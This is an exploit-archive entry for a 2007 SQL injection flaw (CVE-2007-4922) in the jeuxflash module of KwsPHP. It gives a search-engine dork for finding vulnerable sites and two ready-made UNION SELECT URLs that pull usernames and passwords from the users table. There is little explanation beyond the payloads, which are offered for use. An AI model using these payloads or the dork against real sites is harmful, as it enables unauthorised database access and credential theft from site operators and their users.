KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2007-09-12  
date_updated: 2016-11-17  
verified: 1  
codes: OSVDB-38969;CVE-2007-4922  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4400.txt  

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site:
http://koogar.alorys-hebergement.com/kwsphp/index.php?mod=downloads&filedl=30&before=8&p_dl=1
## Dork : inurl:index.php?mod=jeuxflash


## EXPLOITS :

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id=-1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20from%20users%20where%20id=1--


## Note
you must register first



## GREETZ  :  CoNaN , hell15 , RachiDox , Mr Al3FriTe , muslim4ever , DDoS

#########################################################################
KwsPHP  Module   ( jeuxflash )    Remote SQL Injection Vulnerability
#########################################################################

# milw0rm.com [2007-09-13]